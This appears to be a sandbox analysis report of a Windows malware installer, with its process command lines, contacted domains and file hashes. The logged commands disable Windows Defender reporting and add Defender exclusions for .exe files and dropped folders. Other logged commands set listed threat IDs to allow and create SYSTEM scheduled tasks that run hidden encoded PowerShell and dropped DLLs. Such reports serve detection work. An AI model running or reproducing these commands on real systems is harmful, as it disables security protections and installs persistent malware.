"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gxjPlCUcA" /SC once /ST 18:56:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gxjPlCUcA"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gxjPlCUcA"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bWLKrWFeqGsUKIPSIT" /SC once /ST 23:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe\" KP /site_id 525403 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe KP /site_id 525403 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SvbbHukzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SvbbHukzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYDCXZXPsTrrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XYDCXZXPsTrrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nolBHjueEzUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nolBHjueEzUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yOvDRBMJNKKU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yOvDRBMJNKKU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YVKeAuHUOaLCRzVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\YVKeAuHUOaLCRzVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\grMXAHIUMHIHAuvw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\grMXAHIUMHIHAuvw\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yOvDRBMJNKKU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\grMXAHIUMHIHAuvw /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gBhwtZQku" /SC once /ST 16:44:20 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\grMXAHIUMHIHAuvw /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YVKeAuHUOaLCRzVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\YVKeAuHUOaLCRzVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gBhwtZQku"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nolBHjueEzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR" /t REG_DWORD /d 0 /reg:64

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XYDCXZXPsTrrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SvbbHukzU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gBhwtZQku"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "biFxKMwOTZzXEKwTU" /SC once /ST 00:07:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe\" NQ /site_id 525403 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "biFxKMwOTZzXEKwTU"

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe

C:\Windows\Temp\grMXAHIUMHIHAuvw\nAUssBiCXSnmAZV\qSPtVBy.exe NQ /site_id 525403 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bWLKrWFeqGsUKIPSIT"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SvbbHukzU\kbwbtR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HvGgydgoxkjNzSQ" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "HvGgydgoxkjNzSQ2" /F /xml "C:\Program Files (x86)\SvbbHukzU\xvUjymx.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "HvGgydgoxkjNzSQ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "HvGgydgoxkjNzSQ"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "SuOhdtQTTGzWOe" /F /xml "C:\Program Files (x86)\yOvDRBMJNKKU2\TPakwtl.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "wXhUETfkEDyNN2" /F /xml "C:\ProgramData\YVKeAuHUOaLCRzVB\IveybOc.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gmBhVUxyoAiYAznxf2" /F /xml "C:\Program Files (x86)\dVbwgRbTSJJLORWiduR\XylehJQ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ESjeOYxIKdVsIzcFOuL2" /F /xml "C:\Program Files (x86)\XYDCXZXPsTrrC\FYPpVvk.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bLgAHCKDimrPMlxXg" /SC once /ST 12:44:21 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\grMXAHIUMHIHAuvw\kzNhjehN\HzGHCWl.dll\",#1 /site_id 525403" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "bLgAHCKDimrPMlxXg"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\grMXAHIUMHIHAuvw\kzNhjehN\HzGHCWl.dll",#1 /site_id 525403

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\grMXAHIUMHIHAuvw\kzNhjehN\HzGHCWl.dll",#1 /site_id 525403

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "biFxKMwOTZzXEKwTU"

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bLgAHCKDimrPMlxXg"

Network

Country Destination Domain Proto
US 93.184.221.240:80 tcp
N/A 224.0.0.251:5353 udp
FR 40.79.141.153:443 tcp
US 93.184.220.29:80 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
US 8.8.8.8:53 addons.mozilla.org udp
NL 65.9.86.11:80 addons.mozilla.org tcp
NL 65.9.86.11:443 addons.mozilla.org tcp
US 8.8.8.8:53 clients2.google.com udp
NL 142.250.179.174:443 clients2.google.com tcp
US 8.8.8.8:53 api3.check-data.xyz udp
US 52.41.252.216:80 api3.check-data.xyz tcp
US 93.184.221.240:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zS6304.tmp\Install.exe

MD5 bd35df49cacc0d3f9c3db5d688438580
SHA1 364ac175e546fe6db9d7b07f52b1901b3b8f0ee8
SHA256 d5030b6c215b8e54b9dcc25a3da215475abfd4323d8cbb8bc9912d363f4f6b63
SHA512 7f62e948af40698e4859aa2e10735a02f8cb7df6810594cada99549db0f6f119feed99960e1b2990ac70197d712486e3c70c6947c8b8ba293ea83a657a06c901

C:\Users\Admin\AppData\Local\Temp\7zS696D.tmp\Install.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

C:\Users\Admin\AppData\Local\Temp\aFevMsDBlqIRbqTyh\IZVHwqqvKwOqTrb\ZLQwkOe.exe

MD5 6772e7af138504e782c6e77d79080a21
SHA1 f1d34996df460e49dad43a5e14c27d01db59c2a4
SHA256 4ad4db7017f6c5f587cac7c735c91e20a879ad6aa7c6f3a2188cb8ec173a797d
SHA512 07b6119f299b3d396395b249526d3564b58d553e7889659988233260f04b8a425b07762761e9e9631ad3bd06f2ed0688623cc1342a497f60b02ddd3394489180

